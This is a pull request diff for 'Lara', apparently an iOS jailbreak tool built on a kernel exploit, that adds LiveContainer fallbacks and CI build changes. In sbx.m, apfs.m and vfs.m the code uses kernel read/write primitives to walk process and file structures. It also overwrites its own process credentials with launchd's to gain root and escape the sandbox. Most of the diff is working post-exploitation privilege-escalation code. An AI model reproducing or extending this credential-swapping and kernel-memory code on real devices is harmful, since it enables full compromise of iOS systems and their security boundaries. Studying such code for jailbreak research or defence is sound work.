### PR TITLE
fix: Lara not working in Livecontainer on ios 17.1

### DIFF
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -46,13 +46,24 @@ jobs:
           cp -R "$APP_PATH" "$PWD/build/Payload/"
           (cd "$PWD/build" && /usr/bin/zip -qry lara.ipa Payload)
 
+      - name: upload build artifact
+        if: github.event_name == 'pull_request'
+        uses: actions/upload-artifact@v4
+        with:
+          name: lara-ipa
+          path: |
+            build/lara.ipa
+            build.log
+
       - name: create release tag
+        if: github.event_name != 'pull_request'
         id: tag
         run: |
           TAG="build_$(date +'%Y%m%d%H%M%S')-$(git rev-parse --short HEAD)"
           echo "TAG=$TAG" >> $GITHUB_ENV
 
       - name: get last 12h commits
+        if: github.event_name != 'pull_request'
         id: commits
         run: |
           COMMITS=$(git log --since="12 hours ago" --pretty=format:"- %h %s (%an)")
@@ -65,6 +76,7 @@ jobs:
           echo "EOF" >> $GITHUB_ENV
 
       - name: delete old release
+        if: github.event_name != 'pull_request'
         uses: actions/github-script@v7
         with:
           github-token: ${{ secrets.GITHUB_TOKEN }}
@@ -84,6 +96,7 @@ jobs:
             }
 
       - name: create new release
+        if: github.event_name != 'pull_request'
         uses: softprops/action-gh-release@v1
         with:
           tag_name: latest

--- a/lara/kexploit/pe/apfs.m
+++ b/lara/kexploit/pe/apfs.m
@@ -7,6 +7,7 @@
 
 #import "darksword.h"
 #import "offsets.h"
+#import "utils.h"
 #import "xpaci.h"
 
 #include <stdint.h>
@@ -151,12 +152,38 @@ struct apfs_fsnode {
 uint64_t getvnodefor(const char *path) {
     int fd = open(path, O_RDONLY);
     if (fd == -1) return -1;
+
+    uint64_t self_proc = ds_get_our_proc();
+    if (!self_proc && is_likely_livecontainer_runtime()) {
+        self_proc = ourproc();
+        if (!self_proc) {
+            printf("(apfs) failed to recover our proc in LiveContainer\n");
+            close(fd);
+            return -1;
+        }
+    }
+    if (!self_proc) {
+        close(fd);
+        return -1;
+    }
     
-    uint64_t fileprocPtrArr = ds_kread64(ds_get_our_proc() + off_proc_p_fd + off_filedesc_fd_ofiles);
+    uint64_t fileprocPtrArr = ds_kread64(self_proc + off_proc_p_fd + off_filedesc_fd_ofiles);
     fileprocPtrArr = xpaci(fileprocPtrArr);
+    if (!fileprocPtrArr) {
+        close(fd);
+        return -1;
+    }
     uint64_t fileproc = ds_kread64(fileprocPtrArr + (8 * fd));
+    if (!fileproc) {
+        close(fd);
+        return -1;
+    }
     uint64_t fp_glob = ds_kread64(fileproc + off_fileproc_fp_glob);
     fp_glob = xpaci(fp_glob);
+    if (!fp_glob) {
+        close(fd);
+        return -1;
+    }
     uint64_t vnode = ds_kread64(fp_glob + off_fileglob_fg_data);
     vnode = xpaci(vnode);
     

--- a/lara/kexploit/pe/sbx.m
+++ b/lara/kexploit/pe/sbx.m
@@ -308,6 +308,12 @@ NSString* sbx_gettoken(NSString *path) {
 
 int sbx_elevate(void) {
     uint64_t launchd = procbyname("launchd");
+    if (!launchd && is_likely_livecontainer_runtime()) {
+        launchd = procbypid(1);
+        if (launchd) {
+            sbx_log("resolved launchd via pid 1 fallback: 0x%llx", launchd);
+        }
+    }
     if (!launchd) {
         sbx_log("could not find launchd");
         return -1;
@@ -320,18 +326,22 @@ int sbx_elevate(void) {
     }
     sbx_log("launchd ucred: 0x%llx", launchducred);
     
-    uint64_t ourproc = ds_get_our_proc();
-    if (!ourproc) {
+    uint64_t self_proc = ds_get_our_proc();
+    if (!self_proc && is_likely_livecontainer_runtime()) {
+        sbx_log("ds_get_our_proc() returned 0x0 during elevate; trying ourproc() fallback...");
+        self_proc = ourproc();
+    }
+    if (!self_proc) {
         sbx_log("failed to get our proc");
         return -1;
     }
-    sbx_log("ourproc: 0x%llx", ourproc);
+    sbx_log("ourproc: 0x%llx", self_proc);
     
-    uint64_t ourucredraw = ds_kread64(ourproc + 0x10);
+    uint64_t ourucredraw = ds_kread64(self_proc + 0x10);
     uint64_t ourucred = S(ourucredraw);
     sbx_log("ourucred: 0x%llx", ourucred);
     
-    ds_kwrite64(ourproc + 0x10, launchducred);
+    ds_kwrite64(self_proc + 0x10, launchducred);
     
     if (getuid() == 0) {
         sbx_log("elevate success!");

--- a/lara/kexploit/pe/vfs.m
+++ b/lara/kexploit/pe/vfs.m
@@ -195,6 +195,40 @@ static uint64_t g_ncache_vp_off = ONC_VP;
 
 static NSString *const krootvnodekey = @"lara.rootvnode_offset";
 
+static uint64_t vfs_effective_proc(void) {
+    uint64_t proc = ds_get_our_proc();
+    if (isheappointer(proc)) {
+        return proc;
+    }
+
+    if (is_likely_livecontainer_runtime()) {
+        proc = ourproc();
+        if (isheappointer(proc)) {
+            klog("recovered proc via ourproc(): 0x%llx", proc);
+            return proc;
+        }
+    }
+
+    return 0;
+}
+
+static uint64_t vfs_effective_task(uint64_t proc) {
+    uint64_t task = ds_get_our_task();
+    if (isheappointer(task)) {
+        return task;
+    }
+
+    if (is_likely_livecontainer_runtime() && isheappointer(proc)) {
+        task = taskbyproc(proc);
+        if (isheappointer(task)) {
+            klog("recovered task via taskbyproc(): 0x%llx", task);
+            return task;
+        }
+    }
+
+    return 0;
+}
+
 static uint64_t loadrootvnodeoffset(void) {
     NSNumber *n = [[NSUserDefaults standardUserDefaults] objectForKey:krootvnodekey];
     if (!n) return 0;
@@ -209,15 +243,19 @@ static uint64_t refresh_rootvnodeoffset(void) {
 }
 
 static int vfs_findprocs(void) {
-    g_our_proc = ds_get_our_proc();
+    g_our_proc = vfs_effective_proc();
     if (!isheappointer(g_our_proc)) {
-        klog("ds_get_our_proc() failed");
+        klog("effective proc lookup failed");
     } else {
         klog("our proc: 0x%llx", g_our_proc);
     }
 
     g_launchd_proc = procbyname("launchd");
     if (!isheappointer(g_launchd_proc)) {
+        if (is_likely_livecontainer_runtime()) {
+            klog("procbyname(\"launchd\") failed in LiveContainer; continuing without it");
+            return isheappointer(g_our_proc) ? 0 : -1;
+        }
         klog("procbyname(\"launchd\") failed");
         return -1;
     }
@@ -437,7 +475,8 @@ static bool validatetask(uint64_t task) {
 }
 
 static uint64_t gettask(void) {
-    uint64_t task = ds_get_our_task();
+    uint64_t proc = vfs_effective_proc();
+    uint64_t task = vfs_effective_task(proc);
     if (isheappointer(task)) {
         klog("task (from exploit): 0x%llx", task);
         
@@ -454,7 +493,6 @@ static uint64_t gettask(void) {
         }
     }
 
-    uint64_t proc = ds_get_our_proc();
     if (!isheappointer(proc)) {
         klog("no proc/task available");
         return 0;
@@ -490,8 +528,8 @@ int vfs_init(void) {
     klog("vfs_init starting...");
     vfs_progress(0.05);
 
-    uint64_t proc = ds_get_our_proc();
-    uint64_t task = ds_get_our_task();
+    uint64_t proc = vfs_effective_proc();
+    uint64_t task = vfs_effective_task(proc);
     if (proc) {
         g_heap_prefix = proc & 0xFFFFFF0000000000ULL;
         klog("Extracted heap PAC prefix: 0x%llx", g_heap_prefix);

--- a/lara/kexploit/utils.h
+++ b/lara/kexploit/utils.h
@@ -19,6 +19,7 @@ extern "C" {
 
 void init_offsets(void);
 uint64_t getprocsize(void);
+uint64_t procbypid(pid_t pid);
 uint64_t ourproc(void);
 uint64_t taskbyproc(uint64_t procaddr);
 uint64_t procbyname(const char *procname);


### PR DESCRIPTION
Fixes LiveContainer follow-up failures caused by stale cached proc/task state and early fallback/default values, by retrying proc/task recovery only in the affected LiveContainer paths instead of trusting the initial Darksword cache. (#85)